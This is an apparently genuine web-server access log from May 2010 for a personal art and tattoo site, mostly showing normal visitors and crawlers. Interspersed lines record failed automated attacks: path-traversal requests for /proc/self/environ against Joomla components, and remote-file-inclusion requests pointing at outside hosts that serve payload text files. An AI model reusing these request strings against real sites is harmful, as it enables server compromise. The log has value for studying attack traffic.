87.250.255.243 - - [22/May/2010:20:58:58 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
187.45.193.159 - - [22/May/2010:21:05:03 -0500] "GET /logs/admin/inc/change_action.php?format_menue=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
187.45.193.159 - - [22/May/2010:21:05:04 -0500] "GET /admin/inc/change_action.php?format_menue=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
74.55.41.132 - - [22/May/2010:21:06:25 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.41.132 - - [22/May/2010:21:06:25 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.41.132 - - [22/May/2010:21:06:25 -0500] "GET /index.php?option=com_mtfireeagle&controller=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.41.132 - - [22/May/2010:21:06:25 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.41.132 - - [22/May/2010:21:06:26 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.41.132 - - [22/May/2010:21:06:26 -0500] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.41.132 - - [22/May/2010:21:06:26 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.41.132 - - [22/May/2010:21:06:26 -0500] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
87.250.255.243 - - [22/May/2010:21:07:06 -0500] "GET /logs/access_log.1193270400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
76.90.152.101 - - [22/May/2010:21:07:32 -0500] "GET /artwork/toys.htm HTTP/1.1" 200 1337 "http://www.bing.com/images/search?q=noah+ark+animals&FORM=IGRE1""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
76.90.152.101 - - [22/May/2010:21:07:33 -0500] "GET /artwork/blocks2.png HTTP/1.1" 200 26605 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
76.90.152.101 - - [22/May/2010:21:07:33 -0500] "GET /artwork/blocks1.png HTTP/1.1" 200 30135 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
76.90.152.101 - - [22/May/2010:21:07:34 -0500] "GET /artwork/ark2.gif HTTP/1.1" 200 81971 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
76.90.152.101 - - [22/May/2010:21:07:34 -0500] "GET /artwork/arkanimals1.gif HTTP/1.1" 200 76485 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
76.90.152.101 - - [22/May/2010:21:07:34 -0500] "GET /artwork/mixnmatchanimals2.gif HTTP/1.1" 200 63914 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
76.90.152.101 - - [22/May/2010:21:07:34 -0500] "GET /artwork/rocking-mc.jpg HTTP/1.1" 200 66440 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
76.90.152.101 - - [22/May/2010:21:07:34 -0500] "GET /artwork/block-set2.jpg HTTP/1.1" 200 67585 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
76.90.152.101 - - [22/May/2010:21:07:34 -0500] "GET /artwork/family.jpg HTTP/1.1" 200 15546 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.0.0; .NET CLR 3.0.30729; AskTB5.6)"
77.221.130.2 - - [22/May/2010:21:11:14 -0500] "GET //common/db.php?commonpath=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.2 - - [22/May/2010:21:11:14 -0500] "GET /logs/access_log.1271289600//common/db.php?commonpath=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.2 - - [22/May/2010:21:11:14 -0500] "GET /logs//common/db.php?commonpath=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
77.221.130.2 - - [22/May/2010:21:11:14 -0500] "GET /logs/access_log.1272153600//common/db.php?commonpath=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.2 - - [22/May/2010:21:11:22 -0500] "GET //common/db.php?commonpath=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.2 - - [22/May/2010:21:11:22 -0500] "GET /logs/access_log.1271289600//common/db.php?commonpath=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.2 - - [22/May/2010:21:11:22 -0500] "GET /logs//common/db.php?commonpath=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
77.221.130.2 - - [22/May/2010:21:11:22 -0500] "GET /logs/access_log.1272153600//common/db.php?commonpath=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.120.226.212 - - [22/May/2010:21:12:20 -0500] "GET /logs///index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
174.120.226.212 - - [22/May/2010:21:12:21 -0500] "GET ///index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
87.250.255.243 - - [22/May/2010:21:14:15 -0500] "GET /costume/thmb9.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
187.45.193.159 - - [22/May/2010:21:14:30 -0500] "GET /logs/admin/inc/change_action.php?format_menue=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
187.45.193.159 - - [22/May/2010:21:14:31 -0500] "GET /admin/inc/change_action.php?format_menue=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
119.235.24.251 - - [22/May/2010:21:15:10 -0500] "GET /logs/access_log.1271548800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:21:15:10 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:21:15:10 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:21:15:25 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:21:15:25 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:21:15:25 -0500] "GET /logs/access_log.1271548800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
207.46.13.53 - - [22/May/2010:21:15:33 -0500] "GET /logs/access_log.1181779200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.235.24.251 - - [22/May/2010:21:15:55 -0500] "GET /logs/access_log.1271548800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:21:15:58 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.250.255.243 - - [22/May/2010:21:22:20 -0500] "GET /logs/access_log.1255478400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.196 - - [22/May/2010:21:23:02 -0500] "GET /logs/access_log.1261353600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.177 - - [22/May/2010:21:24:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [22/May/2010:21:27:52 -0500] "GET /logs/access_log.1243209600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.245.220.19 - - [22/May/2010:21:29:50 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:29:51 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:29:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.245.220.19 - - [22/May/2010:21:30:19 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
207.46.13.47 - - [22/May/2010:21:30:33 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [22/May/2010:21:32:44 -0500] "GET /logs/access_log.1246838400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.226 - - [22/May/2010:21:35:03 -0500] "GET /logs/access_log.1174521600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [22/May/2010:21:41:55 -0500] "GET /logs/access_log.1259798400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.37 - - [22/May/2010:21:47:33 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.234 - - [22/May/2010:21:49:33 -0500] "GET /logs/access_log.1267056000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [22/May/2010:21:56:36 -0500] "GET /logs/access_log.1253318400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
218.215.49.223 - - [22/May/2010:22:02:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com.au/search?q=vintage+tattoos&hl=en&rlz=1T4ACAW_enAU368AU368&prmd=i&start=10&sa=N""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:39 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:40 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:40 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:40 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:41 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:41 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:41 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:42 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:43 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:44 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:44 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:02:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
87.250.255.243 - - [22/May/2010:22:03:01 -0500] "GET /logs/access_log.1202774400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
218.215.49.223 - - [22/May/2010:22:03:11 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:12 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:12 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:12 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:12 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:12 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:12 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:14 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:16 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:16 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:16 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:40 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:41 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
